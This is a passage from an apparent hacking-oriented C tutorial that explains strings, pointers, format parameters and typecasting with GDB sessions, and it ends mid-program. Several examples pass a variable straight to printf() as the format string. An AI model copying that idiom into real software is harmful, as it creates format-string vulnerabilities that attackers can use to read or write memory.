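In the preceding program, a 20-element character array is defined as str_a, and each element of the array is written to, one by one. Notice that the numbering begins at 0, as opposed to 1. Also notice that the last character is a 0. (This is also called a null byte.) Since the character array was defined, 20 bytes are allocated for it, but only 15 of these bytes are actually used: 14 characters plus the terminating null byte. The null byte at the end is used as a delimiter character to tell any function that is dealing with the string to stop operations right there. The remaining extra bytes are just garbage and will be ignored. If a null byte were written at index 5 of the character array (str_a[5], in place of the comma), only the characters Hello would be printed by the printf() function.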

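Since setting each character in a character array is painstaking and strings are used fairly often, a set of standard functions was created for string manipulation. For example, the strcpy() function copies a string from a source to a destination, iterating through the source string and copying each byte to the destination (and stopping after it copies the null termination byte). The order of the function's arguments is similar to Intel assembly syntax: destination first, then source. The char_array.c program can be rewritten using strcpy() to accomplish the same thing using the string library. The next version of the char_array program shown below includes string.h since it uses a string function.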

char_array2.c

#include <stdio.h>
#include <string.h>

int main() {
   char str_a[20];

   strcpy(str_a, "Hello, world!\n");
   printf(str_a); 
}

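Let's take a look at this program with GDB. In the output below, the compiled program is opened with GDB and breakpoints are set before, in, and after the strcpy() call. The debugger will pause the program at each breakpoint, giving us a chance to examine registers and memory. The strcpy() function's code comes from a shared library, so the breakpoint in this function can't actually be set until the program is executed.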

reader@hacking:~/booksrc $ gcc -g -o char_array2 char_array2.c
reader@hacking:~/booksrc $ gdb -q ./char_array2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2       #include <string.h>
3
4       int main() {
5          char str_a[20];
6
7          strcpy(str_a, "Hello, world!\n");
8          printf(str_a);
9       }
(gdb) break 6

Breakpoint 1 at 0x80483c4: file char_array2.c, line 6.
(gdb) break strcpy
Function "strcpy" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 2 (strcpy) pending.
(gdb) break 8
Breakpoint 3 at 0x80483d7: file char_array2.c, line 8.
(gdb)

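When the program is run, the strcpy() breakpoint is resolved. At each breakpoint, we're going to look at EIP and the instructions it points to. Notice that the memory location for EIP at the middle breakpoint is different.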

(gdb) run
Starting program: /home/reader/booksrc/char_array2 
Breakpoint 4 at 0xb7f076f4
Pending breakpoint "strcpy" resolved

Breakpoint 1, main () at char_array2.c:7
7          strcpy(str_a, "Hello, world!\n");
(gdb) i r eip
eip            0x80483c4        0x80483c4 <main+16>
(gdb) x/5i $eip
0x80483c4 <main+16>:    mov    DWORD PTR [esp+4],0x80484c4
0x80483cc <main+24>:    lea    eax,[ebp-40]
0x80483cf <main+27>:    mov    DWORD PTR [esp],eax
0x80483d2 <main+30>:    call   0x80482c4 <strcpy@plt>
0x80483d7 <main+35>:    lea    eax,[ebp-40]
(gdb) continue
Continuing.

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) i r eip
eip            0xb7f076f4       0xb7f076f4 <strcpy+4>
(gdb) x/5i $eip
0xb7f076f4 <strcpy+4>:  mov    esi,DWORD PTR [ebp+8]
0xb7f076f7 <strcpy+7>:  mov    eax,DWORD PTR [ebp+12]
0xb7f076fa <strcpy+10>: mov    ecx,esi
0xb7f076fc <strcpy+12>: sub    ecx,eax
0xb7f076fe <strcpy+14>: mov    edx,eax
(gdb) continue
Continuing.

Breakpoint 3, main () at char_array2.c:8
8          printf(str_a);
(gdb) i r eip
eip            0x80483d7        0x80483d7 <main+35>
(gdb) x/5i $eip
0x80483d7 <main+35>:    lea    eax,[ebp-40]
0x80483da <main+38>:    mov    DWORD PTR [esp],eax
0x80483dd <main+41>:    call   0x80482d4 <printf@plt>
0x80483e2 <main+46>:    leave
0x80483e3 <main+47>:    ret
(gdb)

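The address in EIP at the middle breakpoint is different because the code for the strcpy() function comes from a loaded library. In fact, the debugger shows EIP for the middle breakpoint in the strcpy() function, while EIP at the other two breakpoints is in the main() function. I'd like to point out that EIP is able to travel from the main code to the strcpy() code and back again. Each time a function is called, a record is kept on a data structure called the stack. The stack lets EIP return through long chains of function calls. In GDB, the bt command can be used to backtrace the stack. In the output below, the stack backtrace is shown at each breakpoint.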

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/char_array2 
Error in re-setting breakpoint 4:
Function "strcpy" not defined.

Breakpoint 1, main () at char_array2.c:7
7          strcpy(str_a, "Hello, world!\n");
(gdb) bt
#0  main () at char_array2.c:7
(gdb) cont
Continuing.

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt
#0  0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc.so.6
#1  0x080483d7 in main () at char_array2.c:7
(gdb) cont
Continuing.

Breakpoint 3, main () at char_array2.c:8
8          printf(str_a);
(gdb) bt
#0  main () at char_array2.c:8
(gdb)

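At the middle breakpoint, the backtrace of the stack shows its record of the strcpy() call. Also, you may notice that the strcpy() function is at a slightly different address during the second run. This is due to an exploit protection method that is turned on by default since the Linux kernel 2.6.11. We will talk about this protection in more detail later.

Signed, Unsigned, Long, and Short

By default, numerical values in C are signed, which means they can be both negative and positive. In contrast, unsigned values don't allow negative numbers. Since it's all just memory in the end, all numerical values must be stored in binary, and unsigned values make the most sense in binary. A 32-bit unsigned integer can contain values from 0 (all binary 0s) to 4,294,967,295 (all binary 1s). A 32-bit signed integer is still just 32 bits, which means it can only be in one of 2^32 possible bit combinations. This allows 32-bit signed integers to range from -2,147,483,648 to 2,147,483,647. Essentially, one of the bits is a flag marking the value positive or negative. Positively signed values look the same as unsigned values, but negative numbers are stored differently using a method called two's complement. Two's complement represents negative numbers in a form suited for binary adders: when a negative value in two's complement is added to a positive number of the same magnitude, the result is 0. This is done by first writing the positive number in binary, then inverting all the bits, and finally adding 1. It sounds strange, but it works and allows negative numbers to be added to positive numbers using simple binary adders.

This can be explored quickly on a smaller scale using pcalc, a simple programmer's calculator that displays results in decimal, hexadecimal, and binary formats. For simplicity's sake, 8-bit numbers are used in this example.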

reader@hacking:~/booksrc $ pcalc 0y01001001
        73              0x49            0y1001001
reader@hacking:~/booksrc $ pcalc 0y10110110 + 1
        183             0xb7            0y10110111
reader@hacking:~/booksrc $ pcalc 0y01001001 + 0y10110111
        256             0x100           0y100000000
reader@hacking:~/booksrc $

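First, the binary value 01001001 is shown to be positive 73. Then all the bits are flipped, and 1 is added to produce the two's complement representation of negative 73, 10110111. When these two values are added together, the result in the original 8 bits is 0. The pcalc program shows the value 256 because it isn't aware that we're only dealing with 8-bit values. In a binary adder, that carry bit would simply be thrown away because the end of the variable's memory has been reached. This example might shed some light on how two's complement works its magic.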

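In C, variables can be declared as unsigned by simply prepending the keyword unsigned to the declaration. An unsigned integer is declared with unsigned int. In addition, the size of numerical variables can be extended or shortened by adding the keywords long or short. The actual sizes vary depending on the architecture the code is compiled for. C provides an operator called sizeof that can determine the size of a data type. It is used like a function that takes a data type as its input and returns the size of a variable declared with that data type on the target architecture. The datatype_sizes.c program explores the sizes of various data types using sizeof().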

datatype_sizes.c

#include <stdio.h>

int main() {
   printf("The 'int' data type is\t\t %d bytes\n", sizeof(int));
   printf("The 'unsigned int' data type is\t %d bytes\n", sizeof(unsigned int));
   printf("The 'short int' data type is\t %d bytes\n", sizeof(short int));
   printf("The 'long int' data type is\t %d bytes\n", sizeof(long int));
   printf("The 'long long int' data type is %d bytes\n", sizeof(long long int));
   printf("The 'float' data type is\t %d bytes\n", sizeof(float));
   printf("The 'char' data type is\t\t %d bytes\n", sizeof(char));
}

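This piece of code uses the printf() function in a slightly different way. It uses something called a format specifier to display the values returned by the sizeof() expressions. Format specifiers are explained in depth later, so for now, let's just focus on the program's output.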

reader@hacking:~/booksrc $ gcc datatype_sizes.c
reader@hacking:~/booksrc $ ./a.out
The 'int' data type is           4 bytes
The 'unsigned int' data type is  4 bytes
The 'short int' data type is     2 bytes
The 'long int' data type is      4 bytes
The 'long long int' data type is 8 bytes
The 'float' data type is         4 bytes
The 'char' data type is          1 bytes
reader@hacking:~/booksrc $

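As previously stated, both signed and unsigned integers are four bytes in size on the x86 architecture. A float is also four bytes, while a char needs only a single byte. The long keyword can also be combined with double to declare a larger floating-point type (long double); standard C has no short floating-point type.

Pointers

The EIP register is a pointer that "points" to the current instruction during a program's execution by containing its memory address. The idea of pointers is used in C, also. Since physical memory cannot actually be moved, the information in it must be copied. It can be very computationally expensive to copy large chunks of memory for use by different functions or in different places. This is also expensive from a memory standpoint, since space for the new destination copy must be saved or allocated before the source can be copied. Pointers are a solution to this problem. Instead of copying a large block of memory, it is much simpler to pass around the address of the beginning of that block.

Pointers in C can be defined and used like any other variable type. Since memory on the x86 architecture uses 32-bit addressing, pointers are also 32 bits in size (4 bytes). Pointers are defined by prepending an asterisk (*) to the variable name. Instead of defining a variable of that type, a pointer is defined as something that points to data of that type. The pointer.c program is an example of a pointer being used with the char data type, which is only 1 byte in size.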

pointer.c

#include <stdio.h>
#include <string.h>

int main() {
   char str_a[20]; // A 20-element character array
   char *pointer;  // A pointer, meant for a character array
   char *pointer2; // And yet another one

   strcpy(str_a, "Hello, world!\n");
   pointer = str_a; // Set the first pointer to the start of the array.
   printf(pointer);

   pointer2 = pointer + 2; // Set the second one 2 bytes further in.
   printf(pointer2);       // Print it.
   strcpy(pointer2, "y you guys!\n"); // Copy into that spot.
   printf(pointer);        // Print again.
}

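As the comments in the code indicate, the first pointer is set at the beginning of the character array. When the character array is referenced like this, it is actually a pointer itself. This is how this buffer was passed as a pointer to the printf() and strcpy() functions earlier. The second pointer is set to the first pointer's address plus two, and then some things are printed (shown in the output below).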

reader@hacking:~/booksrc $ gcc -o pointer pointer.c
reader@hacking:~/booksrc $ ./pointer
Hello, world!
llo, world!
Hey you guys!
reader@hacking:~/booksrc $

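Let's take a look at this with GDB. The program is recompiled, and a breakpoint is set on line 11 of the source code. This stops the program after the "Hello, world!\n" string has been copied into the str_a buffer and the pointer variable has been set to the beginning of it.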

reader@hacking:~/booksrc $ gcc -g -o pointer pointer.c
reader@hacking:~/booksrc $ gdb -q ./pointer
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2       #include <string.h>
3
4       int main()  {
5           char str_a[20]; // A 20-element character array
6           char *pointer;  // A pointer, meant for a character array
7           char *pointer2; // And yet another one
8
9           strcpy(str_a, "Hello, world!\n");
10          pointer = str_a; // Set the first pointer to the start of the array.
(gdb)
11          printf(pointer);
12
13          pointer2 = pointer + 2; // Set the second one 2 bytes further in.
14          printf(pointer2); // Print it.
15          strcpy(pointer2, "y you guys!\n"); // Copy into that spot.
16          printf(pointer); // Print again.
17      }
(gdb) break 11
Breakpoint 1 at 0x80483dd: file pointer.c, line 11.
(gdb) run
Starting program: /home/reader/booksrc/pointer

Breakpoint 1, main () at pointer.c:11
11         printf(pointer);
(gdb) x/xw pointer
0xbffff7e0:     0x6c6c6548
(gdb) x/s pointer
0xbffff7e0:      "Hello, world!\n"
(gdb)

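When the pointer is examined as a string, it's apparent that the given string is there and is located at memory address 0xbffff7e0. Remember that the string itself isn't stored in the pointer variable; only the memory address 0xbffff7e0 is stored there.

In order to see the actual data stored in the pointer variable, you must use the address-of operator. The address-of operator is a unary operator, which simply means it operates on a single argument. This operator is just an ampersand (&) prepended to a variable name. When it's used, the address of that variable is returned instead of the variable itself. This operator exists both in GDB and in the C programming language.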

(gdb) x/xw &pointer
0xbffff7dc:     0xbffff7e0
(gdb) print &pointer
$1 = (char **) 0xbffff7dc
(gdb) print pointer
$2 = 0xbffff7e0 "Hello, world!\n"
(gdb)

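When the address-of operator is used, the pointer variable is shown to be located at the address 0xbffff7dc in memory, and it contains the address 0xbffff7e0.

The address-of operator is often used in conjunction with pointers, since pointers contain memory addresses. The addressof.c program demonstrates the address-of operator being used to put the address of an integer variable into a pointer, in the line that assigns to int_ptr.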

addressof.c

#include <stdio.h>

int main() {
   int int_var = 5;
   int *int_ptr;

   int_ptr = &int_var; // put the address of int_var into int_ptr
}

The program itself doesn't actually output anything, but you can probably guess what happens, even before debugging with GDB.

reader@hacking:~/booksrc $ gcc -g addressof.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list
1       #include <stdio.h>
2
3       int main() {
4               int int_var = 5;
5               int *int_ptr;
6
7               int_ptr = &int_var; // Put the address of int_var into int_ptr.
8       }
(gdb) break 8
Breakpoint 1 at 0x8048361: file addressof.c, line 8.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at addressof.c:8
8       }
(gdb) print int_var
$1 = 5
(gdb) print &int_var
$2 = (int *) 0xbffff804
(gdb) print int_ptr
$3 = (int *) 0xbffff804
(gdb) print &int_ptr
$4 = (int **) 0xbffff800
(gdb)

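As usual, a breakpoint is set and the program is executed in the debugger. At this point the majority of the program has executed. The first print command shows the value of int_var, and the second shows its address using the address-of operator. The next two print commands show that int_ptr contains the address of int_var, and they also show the address of int_ptr for good measure.

An additional unary operator called the dereference operator exists for use with pointers. This operator returns the data found at the address the pointer is pointing to, instead of the address itself. It takes the form of an asterisk in front of the variable name, similar to the declaration of a pointer. Once again, the dereference operator exists both in GDB and in C. Used in GDB, it can retrieve the integer value int_ptr points to.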

(gdb) print *int_ptr
$5 = 5

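A few additions to the addressof.c code (shown in addressof2.c) will demonstrate all of these concepts. The added printf() functions use format parameters, which I'll explain in the next section. For now, just focus on the program's output.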

addressof2.c

#include <stdio.h>

int main() {
   int int_var = 5;
   int *int_ptr;

   int_ptr = &int_var; // Put the address of int_var into int_ptr.

   printf("int_ptr = 0x%08x\n", int_ptr);
   printf("&int_ptr = 0x%08x\n", &int_ptr);
   printf("*int_ptr = 0x%08x\n\n", *int_ptr);

   printf("int_var is located at 0x%08x and contains %d\n", &int_var, int_var);
   printf("int_ptr is located at 0x%08x, contains 0x%08x, and points to %d\n\n",
      &int_ptr, int_ptr, *int_ptr);
}

The results of compiling and executing addressof2.c are as follows.

reader@hacking:~/booksrc $ gcc addressof2.c
reader@hacking:~/booksrc $ ./a.out
int_ptr = 0xbffff834
&int_ptr = 0xbffff830
*int_ptr = 0x00000005

int_var is located at 0xbffff834 and contains 5
int_ptr is located at 0xbffff830, contains 0xbffff834, and points to 5

reader@hacking:~/booksrc $

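When the unary operators are used with pointers, the address-of operator can be thought of as moving backward, while the dereference operator moves forward in the direction the pointer is pointing.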

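Format Strings

The printf() function can be used to print more than just fixed strings. This function can also use format strings to print variables in many different formats. A format string is just a character string with special escape sequences that tell the function to insert variables printed in a specific format in place of the escape sequence. The way the printf() function has been used in the previous programs, the "Hello, world!\n" string technically is the format string; however, it is devoid of special escape sequences. These escape sequences are also called format parameters, and for each one found in the format string, the function is expected to take an additional argument. Each format parameter begins with a percent sign (%) and uses a single-character shorthand very similar to the formatting characters used by GDB's examine command.

Parameter	Output Type
`%d`	Decimal
`%u`	Unsigned decimal
`%x`	Hexadecimal

All of the preceding format parameters receive their data as values, not pointers to values. There are also some format parameters that expect pointers, such as the following.

Parameter	Output Type
`%s`	String
`%n`	Number of bytes written so far

The %s format parameter expects to be given a memory address; it prints the data at that memory address until a null byte is encountered. The %n format parameter is unique in that it actually writes data. It also expects to be given a memory address, and it writes the number of bytes that have been written so far into that memory address.

For now, our focus will just be the format parameters used for displaying data. The fmt_strings.c program shows some examples of different format parameters.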

fmt_strings.c

#include <stdio.h>
#include <string.h>

int main() {
   char string[10];
   int A = -73;
   unsigned int B = 31337;

   strcpy(string, "sample");
   // Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B);
   printf("[string] %s Address %08x\n", string, string);

   // Example of unary address operator (address-of) and a %x format string
   printf("variable A is at address: %08x\n", &A);
}

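In the preceding code, additional variable arguments are passed to each printf() call for every format parameter in the format string. The final printf() call uses the argument &A, which provides the address of the variable A. The program's compilation and execution are as follows.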

reader@hacking:~/booksrc $ gcc -o fmt_strings fmt_strings.c
reader@hacking:~/booksrc $ ./fmt_strings
[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample Address  bffff870
variable A is at address: bffff86c
reader@hacking:~/booksrc $

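The first two calls to printf() demonstrate the printing of variables A and B using different format parameters. Since there are three format parameters in each line, the variables A and B need to be supplied three times each. The %d format parameter allows for negative values, while %u does not, since it expects unsigned values.

When the variable A is printed using the %u format parameter, it appears as a very high value. This is because A is a negative number stored in two's complement, and the format parameter is trying to print it as if it were an unsigned value. Since two's complement flips all the bits and adds one, the very high bits that used to be zero are now one.

The third line in the example, labeled [field width on B], shows the use of the field-width option in a format parameter. This is just an integer that designates the minimum field width for that format parameter. However, this is not a maximum field width; if the value to be output is greater than the field width, the field width will be exceeded. This happens when 3 is used, since the output data needs 5 bytes. When 10 is used as the field width, 5 bytes of blank space are output before the output data. Additionally, if a field width value begins with a 0, this means the field should be padded with zeros. When 08 is used, for example, the output is 00031337.

The fourth line, labeled [string], simply shows the use of the %s format parameter. Remember that the variable string is actually a pointer containing the address of the string, which works out wonderfully, since the %s format parameter expects its data to be passed by reference.

The final line just shows the address of the variable A, using the unary address-of operator to take the variable's address. This value is displayed as eight hexadecimal digits, padded by zeros.

As these examples show, you should use %d for decimal, %u for unsigned, and %x for hexadecimal values. Minimum field widths can be set by putting a number right after the percent sign, and if the field width begins with 0, it will be padded with zeros. The %s parameter can be used to print strings and should be passed the address of the string. So far, so good.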

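Format strings are used by an entire family of standard I/O functions, including scanf(), which basically works like printf() but is used for input instead of output. One key difference is that the scanf() function expects all of its arguments to be pointers, so the arguments must actually be variable addresses, not the variables themselves. This can be done using pointer variables or by using the unary address-of operator to retrieve the address of the normal variables. The input.c program and execution should help explain.

input.c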

#include <stdio.h>
#include <string.h>

int main() {
   char message[20]; // Large enough for "Hello, world!" plus the null byte
   int count, i;

   strcpy(message, "Hello, world!");

   printf("Repeat how many times? ");
   scanf("%d", &count);

   for(i=0; i < count; i++)
      printf("%3d - %s\n", i, message);
}

In input.c, the scanf() function is used to set the count variable. The output below demonstrates its use.

reader@hacking:~/booksrc $ gcc -o input input.c
reader@hacking:~/booksrc $ ./input
Repeat how many times? 3
  0 - Hello, world!
  1 - Hello, world!
  2 - Hello, world!
reader@hacking:~/booksrc $ ./input
Repeat how many times? 12
  0 - Hello, world!
  1 - Hello, world!
  2 - Hello, world!
  3 - Hello, world!
  4 - Hello, world!
  5 - Hello, world!
  6 - Hello, world!
  7 - Hello, world!
  8 - Hello, world!
  9 - Hello, world!
 10 - Hello, world!
 11 - Hello, world!
reader@hacking:~/booksrc $

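Format strings are used quite often, so familiarity with them is valuable. In addition, having the ability to output the values of variables allows for debugging in the program, without the use of a debugger. Having some form of immediate feedback is fairly vital to the hacker's learning process, and something as simple as printing the value of a variable can allow for lots of exploitation.

Typecasting

Typecasting is simply a way to temporarily change a variable's data type, despite how it was originally defined. When a variable is typecast into a different type, the compiler is basically told to treat that variable as if it were the new data type, but only for that operation. The syntax for typecasting is as follows:

(typecast_data_type) variable

This can be used when dealing with integers and floating-point variables, as typecasting.c demonstrates.

typecasting.c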

#include <stdio.h>

int main() {
   int a, b;
   float c, d;

   a = 13;
   b = 5;

   c = a / b;                 // Divide using integers.
   d = (float) a / (float) b; // Divide integers typecast as floats.

   printf("[integers]\t a = %d\t b = %d\n", a, b);
   printf("[floats]\t c = %f\t d = %f\n", c, d);
}

The results of compiling and executing typecasting.c are as follows.

reader@hacking:~/booksrc $ gcc typecasting.c
reader@hacking:~/booksrc $ ./a.out
[integers]       a = 13 b = 5
[floats]         c = 2.000000    d = 2.600000
reader@hacking:~/booksrc $

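As discussed earlier, dividing the integer 13 by 5 will round down to the incorrect answer of 2, even if this value is being stored into a floating-point variable. However, if these integer variables are typecast into floats, they will be treated as such. This allows for the correct calculation of 2.6.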

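This example is illustrative, but where typecasting really shines is when it is used with pointer variables. Even though a pointer is just a memory address, the C compiler still demands a data type for every pointer. One reason for this is to try to limit programming errors. An integer pointer should only point to integer data, while a character pointer should only point to character data. Another reason is for pointer arithmetic. An integer is four bytes in size, while a character only takes up a single byte. The pointer_types.c program will demonstrate and explain these concepts further. This code uses the format parameter %p to output memory addresses. This is shorthand meant for displaying pointers and is basically equivalent to 0x%08x.

pointer_types.c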

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   char *char_pointer;
   int *int_pointer;

   char_pointer = char_array;
   int_pointer = int_array;

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[integer pointer] points to %p, which contains the integer %d\n",
            int_pointer, *int_pointer);
      int_pointer = int_pointer + 1;
   }

   for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer.
      printf("[char pointer] points to %p, which contains the char '%c'\n",
            char_pointer, *char_pointer);
      char_pointer = char_pointer + 1;
   }
}

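In this code two arrays are defined in memory, one containing integer data and the other containing character data. Two pointers are also defined, one with the integer data type and one with the character data type, and they are set to point at the start of the corresponding data arrays. Two separate for loops iterate through the arrays using pointer arithmetic to adjust the pointer to point at the next value. In the loops, when the integer and character values are actually printed with the %d and %c format parameters, notice that the corresponding printf() arguments must dereference the pointer variables. This is done using the unary * operator, as in *int_pointer and *char_pointer.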

reader@hacking:~/booksrc $ gcc pointer_types.c
reader@hacking:~/booksrc $ ./a.out
[integer pointer] points to 0xbffff7f0, which contains the integer 1
[integer pointer] points to 0xbffff7f4, which contains the integer 2
[integer pointer] points to 0xbffff7f8, which contains the integer 3
[integer pointer] points to 0xbffff7fc, which contains the integer 4
[integer pointer] points to 0xbffff800, which contains the integer 5
[char pointer] points to 0xbffff810, which contains the char 'a'
[char pointer] points to 0xbffff811, which contains the char 'b'
[char pointer] points to 0xbffff812, which contains the char 'c'
[char pointer] points to 0xbffff813, which contains the char 'd'
[char pointer] points to 0xbffff814, which contains the char 'e'
reader@hacking:~/booksrc $

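Even though the same value of 1 is added to int_pointer and char_pointer in their respective loops, the compiler increments the pointer's addresses by different amounts. Since a char is only 1 byte, the pointer to the next char would naturally also be 1 byte over. But since an integer is 4 bytes, a pointer to the next integer has to be 4 bytes over.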

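In pointer_types2.c, the pointers are juxtaposed so that int_pointer points to the character data and vice versa. The main change is in the two assignments that set the pointers.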

pointer_types2.c

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   char *char_pointer;
   int *int_pointer;

   char_pointer = int_array; // The char_pointer and int_pointer now
   int_pointer = char_array; // point to incompatible data types.

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[integer pointer] points to %p, which contains the char '%c'\n",
            int_pointer, *int_pointer);
      int_pointer = int_pointer + 1;
   }

   for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer.
      printf("[char pointer] points to %p, which contains the integer %d\n",
            char_pointer, *char_pointer);
      char_pointer = char_pointer + 1;
   }
}

The following output shows the warnings spewed forth from the compiler.

reader@hacking:~/booksrc $ gcc pointer_types2.c
pointer_types2.c: In function `main':
pointer_types2.c:12: warning: assignment from incompatible pointer type
pointer_types2.c:13: warning: assignment from incompatible pointer type
reader@hacking:~/booksrc $

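In an effort to prevent programming mistakes, the compiler gives warnings about pointers that point to incompatible data types. But the compiler and perhaps the programmer are the only ones that care about a pointer's type. In the compiled code, a pointer is nothing more than a memory address, so the compiler will still compile the code if a pointer points to an incompatible data type; it simply warns the programmer to anticipate unexpected results.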

reader@hacking:~/booksrc $ ./a.out
[integer pointer] points to 0xbffff810, which contains the char 'a'
[integer pointer] points to 0xbffff814, which contains the char 'e'
[integer pointer] points to 0xbffff818, which contains the char '8'
[integer pointer] points to 0xbffff81c, which contains the char '
[integer pointer] points to 0xbffff820, which contains the char '?'
[char pointer] points to 0xbffff7f0, which contains the integer 1
[char pointer] points to 0xbffff7f1, which contains the integer 0
[char pointer] points to 0xbffff7f2, which contains the integer 0
[char pointer] points to 0xbffff7f3, which contains the integer 0
[char pointer] points to 0xbffff7f4, which contains the integer 2
reader@hacking:~/booksrc $

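Even though int_pointer points to character data that only contains 5 bytes of data, it is still typed as an integer. This means that adding 1 to the pointer increments the address by 4 each time. Similarly, the char_pointer's address is only incremented by 1 each time, stepping through the 20 bytes of integer data (five 4-byte integers) one byte at a time. Once again, the little-endian byte order of the integer data is apparent when the 4-byte integer is examined one byte at a time. The 4-byte value of 0x00000001 is actually stored in memory as 0x01, 0x00, 0x00, 0x00.

There will be situations like this in which you are using a pointer that points to data with a conflicting type. Since the pointer type determines the size of the data it points to, it's important that the type is correct. As you can see in pointer_types3.c below, typecasting is just a way to change the type of a variable on the fly.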

pointer_types3.c

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   char *char_pointer;
   int *int_pointer;

   char_pointer = (char *) int_array; // Typecast into the
   int_pointer = (int *) char_array;  // pointer's data type.

   for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer.
      printf("[integer pointer] points to %p, which contains the char '%c'\n",
            int_pointer, *int_pointer);
      int_pointer = (int *) ((char *) int_pointer + 1);
   }

   for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer.
      printf("[char pointer] points to %p, which contains the integer %d\n",
            char_pointer, *char_pointer);
      char_pointer = (char *) ((int *) char_pointer + 1);
   }
}

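In this code, when the pointers are initially set, the data is typecast into the pointer's data type. This prevents the C compiler from complaining about the conflicting data types; however, any pointer arithmetic will still be incorrect. To fix that, when 1 is added to the pointers, they must first be typecast into the correct data type so the address is incremented by the correct amount. Then this pointer needs to be typecast back into the pointer's data type once again. It doesn't look too pretty, but it works.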

reader@hacking:~/booksrc $ gcc pointer_types3.c
reader@hacking:~/booksrc $ ./a.out
[integer pointer] points to 0xbffff810, which contains the char 'a'
[integer pointer] points to 0xbffff811, which contains the char 'b'
[integer pointer] points to 0xbffff812, which contains the char 'c'
[integer pointer] points to 0xbffff813, which contains the char 'd'
[integer pointer] points to 0xbffff814, which contains the char 'e'
[char pointer] points to 0xbffff7f0, which contains the integer 1
[char pointer] points to 0xbffff7f4, which contains the integer 2
[char pointer] points to 0xbffff7f8, which contains the integer 3
[char pointer] points to 0xbffff7fc, which contains the integer 4
[char pointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

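Naturally, it is far easier to use the correct data type for pointers in the first place; however, sometimes a generic, typeless pointer is desired. In C, a void pointer is a typeless pointer, defined with the void keyword. Experimenting with void pointers quickly reveals a few things about typeless pointers. First, a pointer cannot be dereferenced unless it has a type. To retrieve the value stored at the pointer's memory address, the compiler must first know what type of data it is. Second, void pointers must also be typecast before doing pointer arithmetic. These are fairly intuitive limitations, and they mean that a void pointer's main purpose is simply to hold a memory address.

The pointer_types3.c program can be modified to use a single void pointer by typecasting it to the proper type each time it is used. The compiler knows that a void pointer is typeless, so any type of pointer can be stored in a void pointer without typecasting. This also means that a void pointer must always be typecast when it is dereferenced. These differences can be seen in pointer_types4.c, which uses a void pointer.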

pointer_types4.c

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   void *void_pointer;

   void_pointer = (void *) char_array;

   for(i=0; i < 5; i++) { // Iterate through the char array with the void_pointer.
      printf("[char pointer] points to %p, which contains the char '%c'\n",
            void_pointer, *((char *) void_pointer));
      void_pointer = (void *) ((char *) void_pointer + 1);
   }

   void_pointer = (void *) int_array;

   for(i=0; i < 5; i++) { // Iterate through the int array with the void_pointer.
      printf("[integer pointer] points to %p, which contains the integer %d\n",
            void_pointer, *((int *) void_pointer));
      void_pointer = (void *) ((int *) void_pointer + 1);
   }
}

The results of compiling and executing pointer_types4.c are as follows.

reader@hacking:~/booksrc $ gcc pointer_types4.c
reader@hacking:~/booksrc $ ./a.out
[char pointer] points to 0xbffff810, which contains the char 'a'
[char pointer] points to 0xbffff811, which contains the char 'b'
[char pointer] points to 0xbffff812, which contains the char 'c'
[char pointer] points to 0xbffff813, which contains the char 'd'
[char pointer] points to 0xbffff814, which contains the char 'e'
[integer pointer] points to 0xbffff7f0, which contains the integer 1
[integer pointer] points to 0xbffff7f4, which contains the integer 2
[integer pointer] points to 0xbffff7f8, which contains the integer 3
[integer pointer] points to 0xbffff7fc, which contains the integer 4
[integer pointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

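The compilation and output of pointer_types4.c are basically the same as those of pointer_types3.c. The void pointer really just holds the memory addresses, while the hard-coded typecasts tell the compiler to use the proper type whenever the pointer is used.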

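Since the type is taken care of by the typecasts, the void pointer is truly nothing more than a memory address. With the data types defined by typecasting, anything big enough to hold a four-byte value (the size of an address on this 32-bit system) can work the same way as a void pointer. In pointer_types5.c, an unsigned integer is used to store this address.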

pointer_types5.c

#include <stdio.h>

int main() {
   int i;

   char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
   int int_array[5] = {1, 2, 3, 4, 5};

   unsigned int hacky_nonpointer;

   hacky_nonpointer = (unsigned int) char_array;

   for(i=0; i < 5; i++) { // Iterate through the char array with hacky_nonpointer.
      printf("[hacky_nonpointer] points to %p, which contains the char '%c'\n",
            hacky_nonpointer, *((char *) hacky_nonpointer));
      hacky_nonpointer = hacky_nonpointer + sizeof(char);
   }

   hacky_nonpointer = (unsigned int) int_array;

   for(i=0; i < 5; i++) { // Iterate through the int array with hacky_nonpointer.
      printf("[hacky_nonpointer] points to %p, which contains the integer %d\n",
            hacky_nonpointer, *((int *) hacky_nonpointer));
